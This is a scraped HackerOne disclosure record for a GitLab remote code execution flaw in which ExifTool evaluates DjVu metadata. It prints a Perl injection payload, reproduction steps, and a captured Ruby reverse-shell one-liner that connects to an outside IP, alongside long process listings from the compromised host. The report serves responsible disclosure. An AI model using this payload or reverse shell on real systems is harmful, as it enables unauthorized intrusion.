/var/log/mtail\nroot 1625 0.0 0.0 4384 380 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_apt_metrics\nroot 1626 0.0 0.0 4384 224 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_ntpd_metrics\nroot 1627 0.0 0.0 4384 236 ? S 2020 0:02 svlogd -tt /var/log/prometheus/node_exporter\nroot 1628 0.0 0.0 4384 240 ? S 2020 0:00 svlogd -tt /var/log/gitlab-monitor\nroot 1713 0.0 0.0 13372 908 ? Ss 2020 0:02 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog\nroot 1716 0.0 0.0 0 0 ? I< 2020 0:46 [kworker/14:1H]\nroot 1844 0.0 0.0 0 0 ? I< 2020 0:00 [nfsiod]\nroot 1850 0.0 0.0 277088 2224 ? Ssl 2020 0:36 /usr/lib/policykit-1/polkitd --no-debug\nroot 1878 0.0 0.0 0 0 ? I< 2020 5:54 [kworker/2:1H]\nroot 2084 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:0]\nroot 2095 0.0 0.0 65512 3084 ? Ss 2020 0:04 /usr/sbin/sshd -D\nroot 2102 0.0 0.0 0 0 ? I< 2020 2:31 [kworker/9:1H]\nroot 2120 0.0 0.0 0 0 ? I< 2020 5:08 [kworker/3:1H]\nroot 2138 0.0 0.0 0 0 ? I< 2020 0:31 [kworker/15:1H]\nroot 2146 0.0 0.0 0 0 ? I< 2020 23:45 [kworker/1:1H]\nroot 2151 0.0 0.0 0 0 ? I< 2020 0:40 [kworker/4:1H]\nroot 2167 0.0 0.0 14656 1372 tty1 Ss+ 2020 0:00 /sbin/agetty --noclear tty1 linux\nroot 2177 0.0 0.0 14472 1556 ttyS0 Ss+ 2020 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220\nntp 2204 0.0 0.0 40268 2576 ? Ss 2020 21:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -c /var/lib/ntp/ntp.conf.dhcp -u 112:116\nroot 2270 0.0 0.0 67480 18788 ? Ss 2020 17:03 /usr/bin/python3 /usr/bin/google_ip_forwarding_daemon\nroot 2272 0.0 0.0 67220 16368 ? Ss 2020 10:50 /usr/bin/python3 /usr/bin/google_clock_skew_daemon\nroot 2402 0.0 0.0 65408 2460 ? Ss 2020 1:05 /usr/lib/postfix/sbin/master\npostfix 2411 0.0 0.0 67640 1988 ? S 2020 0:23 qmgr -l -t fifo -u\nroot 2571 0.0 0.0 4392 848 ? Ss 2020 2:50 runsvdir -P /opt/gitlab/service log: ...........................................................................................................................................................................................................................................................................................................................................................................................................\nroot 2618 0.0 0.0 4240 1104 ? Ss 2020 0:01 runsv puma\nroot 2621 0.0 0.0 4240 1192 ? Ss 2020 0:05 runsv logrotate\nroot 2623 0.0 0.0 4240 1144 ? Ss 2020 0:00 runsv nginx\nroot 2625 0.0 0.0 4240 1092 ? Ss 2020 0:01 runsv gitlab-workhorse\ngitlab-+ 3150 0.0 0.0 754368 26924 ? Sl Feb17 35:28 /opt/ruby-2.7.0/bin/ruby /opt/gitlab-monitor/bin/gitlab-mon web -c /opt/gitlab-monitor/config/worker-config.yml\nroot 3164 0.0 0.0 0 0 ? I< 2020 0:12 [kworker/11:1H]\nroot 3211 0.2 0.0 0 0 ? I 12:42 0:04 [kworker/u32:2]\nroot 3222 0.0 0.0 0 0 ? I< 2020 0:15 [kworker/7:1H]\nroot 3463 0.0 0.0 0 0 ? I 10:35 0:00 [kworker/5:1]\nroot 3511 0.0 0.0 0 0 ? I 11:40 0:00 [kworker/12:0]\nroot 4032 0.0 0.1 1571276 107596 ? Ssl 2020 172:34 /opt/prometheus/ebpf_exporter/ebpf_exporter --web.listen-address=:9435 --config.file=/opt/prometheus/ebpf_exporter/config.yml\nroot 4171 0.0 0.0 4376 640 ? S 13:12 0:00 sleep 600\nroot 4302 0.0 0.0 0 0 ? I< 2020 2:25 [kworker/5:1H]\nroot 4391 0.0 0.0 0 0 ? I< 2020 0:14 [kworker/8:1H]\nroot 4699 0.0 0.0 0 0 ? I 11:09 0:00 [kworker/13:2]\nroot 4812 0.0 0.0 4376 672 ? S 13:13 0:00 sleep 60\nroot 5375 0.0 0.0 4504 788 ? Ss 13:13 0:00 /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper\nroot 5379 0.0 0.0 4376 748 ? S 13:13 0:00 sleep 600\ngit 5398 49.7 1.9 2661404 1274712 ? Sl 12:44 14:43 puma: cluster worker 3: 7369 [gitlab-puma-worker]\ngit 5544 1.3 0.0 45604 27664 ? S 13:14 0:00 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -\ngit 5545 0.0 0.0 0 0 ? Z 13:14 0:00 [sh] <defunct>\ngit 5551 0.0 0.0 105260 10840 ? S 13:14 0:00 ruby -rsocket -e exit if fork;c=TCPSocket.new(\"103.3.61.137\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\ngit 5667 0.0 0.0 4504 740 ? S 13:14 0:00 sh -c ps auxww\ngit 5668 0.0 0.0 34424 2864 ? R 13:14 0:00 ps auxww\nroot 5952 0.0 0.0 0 0 ? I 00:24 0:00 [kworker/5:2]\nroot 6812 0.0 0.0 54640 7080 ? Ss Mar08 0:00 nginx: master process /opt/gitlab/embedded/sbin/nginx -p /var/opt/gitlab/nginx\ngitlab-+ 6813 0.0 0.0 59476 12544 ? S Mar08 18:42 nginx: worker process\ngitlab-+ 6814 0.0 0.0 59380 13704 ? S Mar08 18:28 nginx: worker process\ngitlab-+ 6815 0.0 0.0 59504 13088 ? S Mar08 18:57 nginx: worker process\ngitlab-+ 6816 0.0 0.0 59456 13048 ? S Mar08 19:35 nginx: worker process\ngitlab-+ 6817 0.0 0.0 59468 13396 ? S Mar08 18:41 nginx: worker process\ngitlab-+ 6818 0.0 0.0 59508 13700 ? S Mar08 20:20 nginx: worker process\ngitlab-+ 6819 0.0 0.0 59492 13220 ? S Mar08 19:33 nginx: worker process\ngitlab-+ 6820 0.0 0.0 59460 13420 ? S Mar08 22:00 nginx: worker process\ngitlab-+ 6821 0.0 0.0 59508 13420 ? S Mar08 24:15 nginx: worker process\ngitlab-+ 6822 0.0 0.0 59500 13348 ? S Mar08 20:53 nginx: worker process\ngitlab-+ 6823 0.0 0.0 59660 13588 ? S Mar08 27:47 nginx: worker process\ngitlab-+ 6824 0.0 0.0 59972 14116 ? S Mar08 37:52 nginx: worker process\ngitlab-+ 6825 4.0 0.0 63940 18592 ? S Mar08 1788:21 nginx: worker process\ngitlab-+ 6826 1.9 0.0 61436 15808 ? S Mar08 854:41 nginx: worker process\ngitlab-+ 6827 0.1 0.0 60120 14564 ? S Mar08 79:52 nginx: worker process\ngitlab-+ 6828 0.8 0.0 62348 16532 ? S Mar08 351:59 nginx: worker process\ngitlab-+ 6829 0.0 0.0 54836 3732 ? S Mar08 0:08 nginx: cache manager process\ngit 6952 17.6 0.1 1532460 109784 ? Ssl 10:04 33:35 /opt/gitlab/embedded/bin/gitlab-workhorse -listenNetwork unix -listenUmask 0 -listenAddr /var/opt/gitlab/gitlab-workhorse/sockets/socket -authBackend http://localhost:8080 -authSocket /var/opt/gitlab/gitlab-rails/sockets/gitlab.socket -documentRoot /opt/gitlab/embedded/service/gitlab-rails/public -pprofListenAddr -apiLimit 5 -apiQueueDuration 60s -apiQueueLimit 200 -prometheusListenAddr 0.0.0.0:9229 -secretPath /opt/gitlab/embedded/service/gitlab-rails/.gitlab_workhorse_secret -logFormat json -config config.toml\ngit 7369 10.3 1.5 1859556 1033020 ? Ssl 10:04 19:41 puma 5.1.1 (unix:///var/opt/gitlab/gitlab-rails/sockets/gitlab.socket,tcp://0.0.0.0:8080) [gitlab-puma-worker]\nroot 7522 0.0 0.0 0 0 ? I 10:04 0:00 [kworker/11:2]\nroot 8263 0.0 0.0 0 0 ? I 12:15 0:00 [kworker/14:0]\nroot 8266 0.0 0.0 0 0 ? I 08:19 0:00 [kworker/0:2]\nroot 8581 0.1 0.0 0 0 ? I 12:48 0:02 [kworker/u32:1]\nroot 9122 0.0 0.0 0 0 ? I 10:37 0:00 [kworker/8:0]\ngit 9978 47.0 2.0 3182348 1362056 ? Sl 11:43 42:45 puma: cluster worker 8: 7369 [gitlab-puma-worker]\nconsul 10871 0.5 0.2 257480 143704 ? Ssl 2020 2836:38 /opt/consul/1.7.2/consul agent -config-file=/etc/consul/consul.json -config-dir=/etc/consul/conf.d\ngit 10980 51.1 1.8 2507012 1229264 ? Sl 12:49 12:43 puma: cluster worker 2: 7369 [gitlab-puma-worker]\ninfluxd+ 12182 0.0 0.0 188928 1044 ? Ssl 2020 0:14 /usr/bin/influxdb-relay -config /etc/influxdb-relay/influxdb-relay.conf\nroot 12322 0.0 0.0 0 0 ? I 12:49 0:00 [kworker/11:1]\nroot 12828 0.0 0.0 4384 1276 ? S 2020 0:01 svlogd -tt /var/log/gitlab/puma\nroot 12831 0.2 0.0 4384 1228 ? S 2020 1318:06 svlogd /var/log/gitlab/gitlab-workhorse\nroot 12853 0.0 0.0 4384 1260 ? S 2020 0:02 svlogd -tt /var/log/gitlab/nginx\nroot 12856 0.0 0.0 4384 340 ? S 2020 0:00 svlogd -tt /var/log/gitlab/logrotate\ngit 13196 48.0 2.1 2935068 1437312 ? Sl 12:17 27:28 puma: cluster worker 10: 7369 [gitlab-puma-worker]\nroot 13379 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/7:1]\nroot 13382 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/10:1]\nroot 13611 1.0 0.0 1740892 38864 ? Ssl Jan29 1042:19 /usr/bin/process-exporter --config.path /etc/process-exporter/chef-configured.yaml --web.listen-address=:9256 -threads=false -gather-smaps=false\nroot 14478 0.0 0.0 0 0 ? I 09:24 0:00 [kworker/2:0]\ngit 17155 50.3 1.8 2541576 1218444 ? Sl 12:50 11:50 puma: cluster worker 15: 7369 [gitlab-puma-worker]\nroot 17904 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/2:2]\ngit 21109 48.3 1.9 2572804 1258580 ? Sl 12:55 9:17 puma: cluster worker 5: 7369 [gitlab-puma-worker]\nroot 21296 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/8:1]\nroot 21299 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/1:0]\nroot 21301 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/7:0]\nroot 21306 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/15:1]\nroot 21376 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/9:0]\ngit 21698 48.0 2.2 3093788 1459416 ? Sl 12:26 23:00 puma: cluster worker 9: 7369 [gitlab-puma-worker]\nroot 22003 0.2 0.0 0 0 ? I 12:26 0:05 [kworker/u32:3]\nroot 22131 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/9:2]\nroot 22135 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/4:2]\nroot 22142 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/12:3]\nroot 22143 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/3:1]\nroot 22144 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/13:0]\nroot 22863 0.0 0.0 161112 54712 ? Ssl Jan18 0:15 /opt/chef/embedded/bin/ruby --disable-gems /usr/bin/chef-client -c /etc/chef/client.rb -i 1800 -s 300\nroot 24237 0.0 0.0 288904 59208 ? Sl Mar10 6:50 /opt/td-agent/bin/ruby /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid\nroot 24242 20.6 0.5 3044156 391860 ? Sl Mar10 8337:18 /opt/td-agent/bin/ruby -Eascii-8bit:ascii-8bit /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid --under-supervisor\ngit 24253 51.3 2.0 2857244 1349560 ? Sl 12:29 23:03 puma: cluster worker 13: 7369 [gitlab-puma-worker]\nroot 24667 0.1 0.0 0 0 ? I 11:29 0:11 [kworker/u32:4]\nroot 24911 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:2]\nroot 25156 0.2 0.0 0 0 ? I 12:59 0:01 [kworker/u32:5]\nroot 25516 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/1:1]\ngit 25517 50.4 2.1 2870560 1443204 ? Sl 12:30 21:58 puma: cluster worker 6: 7369 [gitlab-puma-worker]\ngit 25521 49.9 1.8 2550792 1218900 ? Sl 13:00 7:06 puma: cluster worker 4: 7369 [gitlab-puma-worker]\nroot 25525 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/3:2]\nroot 25527 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/15:2]\nroot 26983 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/10:2]\nroot 27893 0.0 0.0 0 0 ? I< 2020 0:00 [xfsalloc]\nroot 27894 0.0 0.0 0 0 ? I< 2020 0:00 [xfs_mru_cache]\ngit 28051 49.9 1.8 2635012 1248076 ? Sl 13:03 5:34 puma: cluster worker 11: 7369 [gitlab-puma-worker]\ngit 28140 50.3 2.1 2943756 1397844 ? Sl 12:33 20:26 puma: cluster worker 14: 7369 [gitlab-puma-worker]\ngit 29132 49.0 2.0 3164444 1367952 ? Sl 12:05 33:39 puma: cluster worker 1: 7369 [gitlab-puma-worker]\nroot 30224 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/14:1]\nroot 30233 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/0:1]\nroot 31940 0.0 0.0 278944 10648 ? Ssl 2020 6:14 /usr/lib/accountsservice/accounts-daemon\nroot 32135 0.1 0.0 0 0 ? I 13:07 0:00 [kworker/u32:0]\nroot 32388 0.0 0.0 0 0 ? I 01:32 0:00 [kworker/4:0]\nroot 32453 5.3 0.0 1774984 40780 ? Sl 2020 13156:17 /opt/prometheus/mtail/mtail -progs /opt/prometheus/mtail/progs -logs /var/log/apt/term.log,/var/log/syslog,/var/log/td-agent/td-agent.log,/var/log/gitlab/gitlab-rails/*.log,/var/log/gitlab/unicorn/unicorn_stderr.log,/var/log/gitlab/unicorn/unicorn_stdout.log -logtostderr\ngit 32635 49.4 2.1 3154204 1401116 ? Sl 12:09 31:54 puma: cluster worker 12: 7369 [gitlab-puma-worker]\ngit 32703 48.7 1.8 2402308 1195496 ? Sl 13:08 3:01 puma: cluster worker 7: 7369 [gitlab-puma-worker]\nexit\n```\n\n\n### Impact\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file\n\n### Examples\n{F1257008}\n{F1257009}\n\n### What is the current *bug* behavior?\nGitLab Workhorse will pass any file to ExifTool, greatly increasing the attack surface. The current bug is in the DjVu module of `ExifTool` which should ideally not ever be hit.\n\n### What is the expected *correct* behavior?\n* There must be better ways of convert C escape sequences than using `eval`\n* Only the TIFF and JPEG modules should be used\n* GitLab Workhorse could check if the file is a valid TIFF of JPEG before passing it to ExifTool\n\n### Output of checks\nThis bug happens on GitLab.com\n\n#### Results of GitLab environment info\n```\nSystem information\nSystem:\nProxy:\t\tno\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.7.2p137\nGem Version:\t3.1.4\nBundler Version:2.1.4\nRake Version:\t13.0.3\nRedis Version:\t6.0.10\nGit Version:\t2.29.0\nSidekiq Version:5.2.9\nGo Version:\tunknown\n\nGitLab information\nVersion:\t13.10.2-ee\nRevision:\tcc4224220e6\nDirectory:\t/opt/gitlab/embedded/service/gitlab-rails\nDB Adapter:\tPostgreSQL\nDB Version:\t12.6\nURL:\t\thttp://192.168.0.127:9080\nHTTP Clone URL:\thttp://192.168.0.127:9080/some-group/some-project.git\nSSH Clone URL:\tgit@192.168.0.127:some-group/some-project.git\nElasticsearch:\tno\nGeo:\t\tno\nUsing LDAP:\tno\nUsing Omniauth:\tyes\nOmniauth Providers:\n\nGitLab Shell\nVersion:\t13.17.0\nRepository storage paths:\n- default: \t/var/opt/gitlab/git-data/repositories\nGitLab Shell path:\t\t/opt/gitlab/embedded/service/gitlab-shell\nGit:\t\t/opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file", "published": "2021-04-07T13:59:49", "modified": "2021-05-14T20:08:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/1154542", "reporter": "vakzz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-15T14:42:53", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [], "modified": "2021-05-15T13:29:47", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-05-15T13:29:47", "rev": 2}}, "objectVersion": "1.5", "bounty": 20000.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/gitlab", "handle": "gitlab", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/a15c8fdab95ed5efd5f3d61e531298869f767d9203f8ea9df2bac929a5d32138"}}, "h1reporter": {"disabled": false, "username": "vakzz", "url": "/vakzz", "profile_picture_urls": {"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/6zbovkumst7oljmo9v21pig3yh9j/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866?response-content-disposition=inline%3B%20filename%3D%2294971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg%22%3B%20filename%2A%3DUTF-8%27%2794971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQR3TCYRT2%2F20210515%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20210515T144253Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEH0aCXVzLXdlc3QtMiJIMEYCIQCVQikVcAUmaTW1q7VoCDxzmvA1zsxORNyolurbS%2FcglQIhAN%2BYp37D%2BRKhDR3UVwZQ0Vi6YVLpHUTrnbb8MdIJHJ6JKvoDCBYQAhoMMDEzNjE5Mjc0ODQ5IgxeVm%2B5c858Zl%2B0hw8q1wPIuUEcpvPAWrB9OgMKrm1XvxASjghdpCoirpaEXouzlBf%2BMgetKYL%2FCUOALEph5Me8mUnL9MjbB0ujSIlz4L3MuD6OmSBjRqRBVfz0P8Iiqup9oXO%2FDtswFgOpDjjRN2GYDeMOIB1ozQkhw6gm79juHbk2jh%2B9gNx8LAMKOHyRlciDuPno4XAk%2FbQu%2FAFjTAIyDmUiUyyohG9tHrM6dtkRvLsor7lRCHu6Wyyl9Yu%2BGfT6P2vDfNJ5YuE%2FoZP%2FrOKda3BY9kzQvck%2FmmiS2hF1ofpESxdGSbvMvfci%2BbpqlcpW9FzNJ7YUB1YsIjoChk0ofBLNeT%2FwgC1waN7v7Ix4KyAoh3MUm9lZn%2FBDJMZa6TN3KHSBWaM5M0Ebwh7KAxKoASF7IYxSLPRLhMVjMf5KC%2FVAtLN8eu0H%2Bqdo65BmWIfFaBlY2pWihaxf2PowwcnzD%2FbvvAdIU8Le8Xsw7tuBevR%2BDZZAPQ%2BhgAhv8PVPHAYpHFg6W2sRJdoEiCY3WlQZQKr4xwRgWcV37Lx8XCNWmyWVEXOz%2F5LNXgZZkKiA1IgCDF%2Fo5xvGeKy%2FUUwnKjgYTw7cky56uhOstKlBghTpPuOTOiovwIhiodZBxq21wT9Ok5Pi0TgwzZH%2FhAY6pAGrrQY%2F8JBv012zbiyvB3p4aEVqEsIIeZgLeJvZc1rmKjvQVo3mhuyVQgASoA38heiJY6Et32cDUe%2FkA43FKpZNAFEBjJ2MdmGRuLWRrM%2F3CrZbT18lu%2BsP6NPPAOva75WRRs%2FokHanJfU2wr0NTvbhDSgkXIPxHqCCDJUmlLYPMJLK3sHPBJRZ6eHhIYLDPWuHHOYtDH8BmfcosM9VD%2BkCq0pbiA%3D%3D&X-Amz-Signature=a6f5608f3f4f6386dbeac7f2a82ffc3ced491fc5aba71faef93f77b5b62ea3af"}, "is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}, "lastseen": "2021-05-15T14:42:53", "differentElements": ["h1reporter"], "edition": 19}, {"bulletin": {"id": "H1:1154542", "hash": "befec6622988cd9a17bdc39ce507b43e", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "GitLab: RCE when removing metadata with ExifTool", "description": "### Summary\nWhen uploading image files, GitLab Workhorse passes any files with the extensions [jpg|jpeg|tiff](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.10.2-ee/workhorse/internal/upload/exif/exif.go#L104) through to [ExifTool](https://exiftool.org/) to remove any non-whitelisted tags.\n\nAn issue with this is that ExifTool will ignore the file extension and try to determine what the file is based on the content, allowing for any of the supported parsers to be hit instead of just JPEG and TIFF by just renaming the uploaded file.\n\nOne of the supported formats is [DjVu](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm). When parsing the DjVu annotation, the [tokens are evaled](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm#L233) to \"convert C escape sequences\". \n\nThere is some validation to try and ensure that everything is properly escaped, but a backslash followed by a newline is correctly handled allowing the quotes to be closed and arbitrary perl inserted and evaluated:\n\n```\n(metadata\n\t(Copyright \"\\\n\" . qx{echo vakzz >/tmp/vakzz} . \\\n\" b \") )\n```\n\n{F1257008} is an example DjVu file with the above metadata, and {F1257009} is an example that runs a reverse shell.\n\n### Steps to reproduce\n1. Download {F1257008} and unzip it\n1. Create a new snippet\n1. In the description field, hit \"Attach a file\"\n1. Select and uplaod `echo_vakzz.jpg`\n1. See that the file `/tmp/vakzz` has been created on the server\n\n\nUploading {F1257009} to https://gitlab.com/-/snippets/new resulted in a shell on `web-09-sv-gprd`:\n\n```\nConnection from [34.74.90.73] port 12345 [tcp/*] accepted (family 2, sport 17073)\nid\nuid=500(git) gid=500(git) groups=500(git)\nhostname -a\nweb-09-sv-gprd\nps auxww\nUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\nroot 1 0.0 0.0 185524 5496 ? Ss 2020 28:31 /sbin/init\nroot 2 0.0 0.0 0 0 ? S 2020 1:44 [kthreadd]\nroot 4 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/0:0H]\nroot 6 0.0 0.0 0 0 ? I< 2020 0:00 [mm_percpu_wq]\nroot 7 0.0 0.0 0 0 ? S 2020 22:50 [ksoftirqd/0]\nroot 8 0.1 0.0 0 0 ? I 2020 552:25 [rcu_sched]\nroot 9 0.0 0.0 0 0 ? I 2020 0:00 [rcu_bh]\nroot 10 0.0 0.0 0 0 ? S 2020 1:05 [migration/0]\nroot 11 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/0]\nroot 12 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/0]\nroot 13 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/1]\nroot 14 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/1]\nroot 15 0.0 0.0 0 0 ? S 2020 1:03 [migration/1]\nroot 16 0.0 0.0 0 0 ? S 2020 20:27 [ksoftirqd/1]\nroot 18 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/1:0H]\nroot 19 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/2]\nroot 20 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/2]\nroot 21 0.0 0.0 0 0 ? S 2020 1:04 [migration/2]\nroot 22 0.0 0.0 0 0 ? S 2020 18:14 [ksoftirqd/2]\nroot 24 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/2:0H]\nroot 25 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/3]\nroot 26 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/3]\nroot 27 0.0 0.0 0 0 ? S 2020 1:05 [migration/3]\nroot 28 0.0 0.0 0 0 ? S 2020 17:57 [ksoftirqd/3]\nroot 30 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/3:0H]\nroot 31 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/4]\nroot 32 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/4]\nroot 33 0.0 0.0 0 0 ? S 2020 1:05 [migration/4]\nroot 34 0.0 0.0 0 0 ? S 2020 17:09 [ksoftirqd/4]\nroot 36 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/4:0H]\nroot 37 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/5]\nroot 38 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/5]\nroot 39 0.0 0.0 0 0 ? S 2020 1:05 [migration/5]\nroot 40 0.0 0.0 0 0 ? S 2020 16:56 [ksoftirqd/5]\nroot 42 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/5:0H]\nroot 43 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/6]\nroot 44 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/6]\nroot 45 0.0 0.0 0 0 ? S 2020 1:05 [migration/6]\nroot 46 0.0 0.0 0 0 ? S 2020 16:33 [ksoftirqd/6]\nroot 48 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/6:0H]\nroot 49 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/7]\nroot 50 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/7]\nroot 51 0.0 0.0 0 0 ? S 2020 1:05 [migration/7]\nroot 52 0.0 0.0 0 0 ? S 2020 16:25 [ksoftirqd/7]\nroot 54 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/7:0H]\nroot 55 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/8]\nroot 56 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/8]\nroot 57 0.0 0.0 0 0 ? S 2020 1:06 [migration/8]\nroot 58 0.0 0.0 0 0 ? S 2020 16:22 [ksoftirqd/8]\nroot 60 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/8:0H]\nroot 61 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/9]\nroot 62 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/9]\nroot 63 0.0 0.0 0 0 ? S 2020 1:05 [migration/9]\nroot 64 0.0 0.0 0 0 ? S 2020 15:52 [ksoftirqd/9]\nroot 66 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/9:0H]\nroot 67 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/10]\nroot 68 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/10]\nroot 69 0.0 0.0 0 0 ? S 2020 1:06 [migration/10]\nroot 70 0.0 0.0 0 0 ? S 2020 16:10 [ksoftirqd/10]\nroot 72 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/10:0H]\nroot 73 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/11]\nroot 74 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/11]\nroot 75 0.0 0.0 0 0 ? S 2020 1:06 [migration/11]\nroot 76 0.0 0.0 0 0 ? S 2020 16:08 [ksoftirqd/11]\nroot 78 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/11:0H]\nroot 79 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/12]\nroot 80 0.0 0.0 0 0 ? S 2020 1:09 [watchdog/12]\nroot 81 0.0 0.0 0 0 ? S 2020 1:03 [migration/12]\nroot 82 0.0 0.0 0 0 ? S 2020 17:07 [ksoftirqd/12]\nroot 84 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/12:0H]\nroot 85 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/13]\nroot 86 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/13]\nroot 87 0.0 0.0 0 0 ? S 2020 1:06 [migration/13]\nroot 88 0.0 0.0 0 0 ? S 2020 16:45 [ksoftirqd/13]\nroot 90 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/13:0H]\nroot 91 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/14]\nroot 92 0.0 0.0 0 0 ? S 2020 1:04 [watchdog/14]\nroot 93 0.0 0.0 0 0 ? S 2020 1:05 [migration/14]\nroot 94 0.0 0.0 0 0 ? S 2020 16:27 [ksoftirqd/14]\nroot 96 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/14:0H]\nroot 97 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/15]\nroot 98 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/15]\nroot 99 0.0 0.0 0 0 ? S 2020 1:07 [migration/15]\nroot 100 0.0 0.0 0 0 ? S 2020 16:35 [ksoftirqd/15]\nroot 102 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/15:0H]\nroot 103 0.0 0.0 0 0 ? S 2020 0:00 [kdevtmpfs]\nroot 104 0.0 0.0 0 0 ? I< 2020 0:00 [netns]\nroot 105 0.0 0.0 0 0 ? S 2020 0:00 [rcu_tasks_kthre]\nroot 106 0.0 0.0 0 0 ? S 2020 0:00 [kauditd]\nroot 110 0.0 0.0 0 0 ? S 2020 0:33 [khungtaskd]\nroot 111 0.0 0.0 0 0 ? S 2020 0:11 